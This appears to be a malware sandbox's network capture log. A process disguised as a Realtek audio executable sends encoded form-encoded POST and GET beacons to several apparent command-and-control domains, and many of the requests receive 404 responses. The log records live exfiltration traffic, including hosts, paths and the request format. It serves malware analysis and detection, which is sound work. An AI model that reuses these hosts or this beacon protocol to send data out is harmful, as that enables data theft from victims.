                                                                                                                                                                              Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
Jan 11, 2025 03:55:34.914129019 CET | 196 | OUT |
                                                                                                                                                                              Data Ascii: Rq68zdk+JOmdbgAsjDSgR6RTDLYaalEuzmtuBRL2MV2D/TU47ewa4YuvfrN9zhhIn+bwtRvy3c52eT8fGqqQ+WJclfJGdJOVmts+Y59ja53rmdV41ZcB/qFYDvRFGdLlq9+t5hMdZdbZw+sLKcsi0iykj+zA0FHLEPXIa1azwN4uAoJIM2sNVM7cx2OrQf5/7Q==
Jan 11, 2025 03:55:35.139514923 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:35 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49770 | 46.30.211.38 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:37.658776045 CET | 489 | OUT | GET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:37.880767107 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49771 | 103.224.182.242 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:43.255373001 CET | 749 | OUT | POST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
Jan 11, 2025 03:55:43.439430952 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:43 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564143.3375901; expires=Tue, 09-Jan-2035 02:55:43 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49772 | 103.224.182.242 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:45.949315071 CET | 769 | OUT | POST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
Jan 11, 2025 03:55:46.130961895 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:46 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564146.2518747; expires=Tue, 09-Jan-2035 02:55:46 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49773 | 103.224.182.242 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:48.651704073 CET | 1289 | OUT | POST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=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
Jan 11, 2025 03:55:48.651751995 CET | 1289 | OUT
                                                                                                                                                                              Data Ascii: uWgvxVD08XZPQoMzK0Foe6e4ncSQtejuK6/l6GW6yBj70o4EWl+9da3Pn0Sph+20/nb988lhtilYdvuaXQqQd4QFoQB+iiVVhx/ujNjPtxbftgALAuc888ISkw9RjrbQsGqy7oGNA0KEi90MwmgNxCcyG2yzUS9W/Prd+5OjWN0ZS3QbLugiRpPNyVsRhwPOxFQJVqc70tWWvTZmF+ecOBy0hgOFAQCUzpKg+8Ll2GaOkjLtakV
Jan 11, 2025 03:55:48.651813030 CET | 5340 | OUT
                                                                                                                                                                              Data Ascii: utYCiLP6zrcbSyR1EsNsIAnERGApbpcp0Nmp1U6W2JyaBcTdyHV8fsHX1LasBI+706xI47dUv7yQo40siRgOxhhjDLgD2vwfAYQoE4ETicVsBQrIo5A7+En3hwUxRQK4CQITgWxEIivul6yeLRZXovDfGn+DX+9xuSk0i+1mjXzvl3ejHisLavFndgfN911DLJhZz4e26IIoq3sKLO4qByKn6JXTSZ1Hi1DKrkIZAUIzNVucHXv
Jan 11, 2025 03:55:48.839473963 CET | 871 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:48 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564148.6182786; expires=Tue, 09-Jan-2035 02:55:48 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49774 | 103.224.182.242 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:55:51.353039980 CET | 485 | OUT | GET /3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:55:51.550105095 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:55:51 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564151.3170118; expires=Tue, 09-Jan-2035 02:55:51 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-length: 1460
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http [TRUNCATED]
Jan 11, 2025 03:55:51.550116062 CET | 443 | IN
                                                                                                                                                                              Data Ascii: w.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; UR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49775 | 101.35.209.183 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:05.514523983 CET | 758 | OUT | POST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefq5i5BRjZSgOTuk5x530mc8/7nQjJkNOfbw==
Jan 11, 2025 03:56:05.828511953 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:05 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49776 | 101.35.209.183 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:08.361296892 CET | 778 | OUT | POST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
Jan 11, 2025 03:56:08.682080984 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:08 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49777 | 101.35.209.183 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:11.197020054 CET | 2578 | OUT | POST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: iS= [TRUNCATED]
Jan 11, 2025 03:56:11.197084904 CET | 5349 | OUT
                                                                                                                                                                              Data Ascii: hx5ldvTjjc97jdrgqNi/1irUr6c2zAw58C7wJdcynk74u+kKH/iGJCik/SpVXqS1DJxg4bgbr89iZ9Xvc3q1SJo6MTvNgsk76IauEVFKvA3MJCwg6CIDrj28tbryfEVpZBgNR27NAm4msjX7t5C6yOJ2XTuCSmPMsSV8uVeiPplI2chkwBCgQNRv0TT6FU7YJz8JTQn2/yimQhfa01/uH5Ledl7PuQbyNNEPqXOiwqUykc432zD
Jan 11, 2025 03:56:11.510946989 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:11 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49778 | 101.35.209.183 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:14.030600071 CET | 488 | OUT | GET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:56:14.333808899 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:14 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49779 | 154.23.178.231 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:20.052020073 CET | 746 | OUT | POST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
Jan 11, 2025 03:56:20.357069969 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49780 | 154.23.178.231 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:22.888964891 CET | 766 | OUT | POST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
Jan 11, 2025 03:56:23.193897009 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:23 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49781 | 154.23.178.231 | 80 | 6612 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:56:25.718099117 CET | 3867 | OUT | POST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 49 4e 70 69 4e 4b 47 34 6f 55 6b 6b 59 57 4b 34 4a 32 4d 2b 6b 69 6c 55 79 51 44 4a 62 52 78 51 53 44 4c 4b 67 30 66 47 72 35 6f 44 6b 71 66 62 2f 43 4a 4f 5a 42 64 46 50 43 42 6f 59 61 62 43 53 31 79 6d 54 7a 64 72 37 55 6e 76 6c 59 64 35 59 52 78 54 4d 77 65 79 7a 67 45 46 72 70 50 45 63 52 43 34 61 5a 63 2f 4a 54 46 56 72 37 58 7a 75 39 43 6f 68 2f 54 42 2f 30 4d 36 51 43 6f 2b 30 54 32 39 4d 63 79 67 39 39 79 64 55 6e 6b 77 30 55 52 65 58 34 59 41 71 58 2b 56 41 6a 6d 6c 43 6c 63 2b 2b [TRUNCATED]
Jan 11, 2025 03:56:25.718147993 CET | 4048 | OUT | Data Raw: 42 75 59 48 43 46 52 4f 75 37 62 30 44 77 4b 38 6d 41 6b 65 76 7a 62 54 79 6f 39 66 6c 48 65 30 42 73 47 4b 37 33 68 63 42 78 68 32 35 72 62 74 50 59 44 39 58 6c 6e 5a 53 76 53 37 35 46 79 4f 48 38 4e 4c 68 33 6c 36 57 34 45 47 48 37 54 6c 77 6f
                                                                                                                                                                              Data Ascii: BuYHCFROu7b0DwK8mAkevzbTyo9flHe0BsGK73hcBxh25rbtPYD9XlnZSvS75FyOH8NLh3l6W4EGH7TlwoAK/w+D/xnxXStF//o5Dlf4zfFVWHiJ3peDQT8XQF7yKJYp/exxiHSH1vna/kwhdxh9G14pbUgYls/2M54fDO+WPSKysns6r+0kvfWLs7at2ZRkXSUgPYO+y0iOmoWwkQmi/MKu+PCTzG9V6QwMf360la5OWdATvYq
Jan 11, 2025 03:56:26.024257898 CET | 312 | IN | HTTP/1.1 404 Not Found
